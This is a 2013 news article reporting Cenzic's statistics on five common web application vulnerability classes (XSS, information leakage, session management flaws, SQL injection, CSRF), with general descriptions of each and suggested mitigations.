5 Dangerous Web Application Flaws Coveted By Attackers4:00 PM EST Fri. Mar. 08, 2013
Ninety-nine percent of applications have one or more vulnerabilities, according to the 2013 Application Vulnerability Trends Report issued by Campbell, Calif.-based application security firm Cenzic. The firm found that the median number of vulnerabilities per tested application is 13. Many of the high-profile data breaches over the past several months were the result of a common Web application vulnerability. While it may be impossible to eradicate all flaws in Web applications, software security experts say eliminating the most commonly targeted errors could help mitigate the risk of many automated attacks and cause some hackers to move on to easier pickings.
Cross-site scripting vulnerabilities are the most commonly detected vulnerabilities in Web applications. They are also one of the most frequently targeted flaws by cybercriminals. It enables an attacker to send malicious scripts by relaying the script from an otherwise trusted URL, according to Cenzic. XSS vulnerabilities appear in 61 percent of applications, the firm said. While much has been said about detecting and fixing XSS errors, the Internet is still riddled with Web applications that contain them. They can be detected with a Web application security scanner or blocked using a Web application firewall.
Information leakage accounted for only 17 percent of Web applications tested by Cenzic in 2012, but the danger posed by the vulnerability makes finding and eradicating them extremely critical. Web applications can leak information in a variety of ways. Sometimes an attacker can get the application to crash, prompting an error message that reveals clues to the underlying infrastructure supporting the application or the application itself. Poorly implemented encryption also can yield information to an attacker.
Attackers can take advantage of poorly implemented session management, enabling them to interject themselves as valid website users. Session management vulnerabilities were detected in 80 percent of applications tested in 2012, more than any other application vulnerability class, according to Cenzic. Software security experts at the Open Web Application Security Project say the use of an application framework with built-in session management capabilities is key to developing an application that maintains user actions within unique sessions. The group discourages developers from implementing their own session management.
SQL injection is a favorite vulnerability of attackers because automated scripts can be used to get a website to send a malicious SQL command to the underlying database in an effort to get it to expose its content. Cenzic said that while all other classes of vulnerabilities saw declines in 2012, SQL injection has risen, but the firm said it could be due to improvements of detection tools more than from new deficiencies in security practices. SQL injection accounted for 16 percent of all Web applications Cenzic tested in 2012.
Cross-site request forgery accounted for 22 percent of all Web applications tested by Cenzic in 2012. The class of vulnerabilities that make up CSRF allows attackers to send pre-authenticated but unauthorized commands using credentials that the application trusts, according to Cenzic. Attackers can use a CSRF attack to "ride" the session of an individual on a particular website by using the victim's browser credentials. In addition to the browser, an attacker can use a malicious script in a Microsoft Office document or Flash file that exploits CSRF.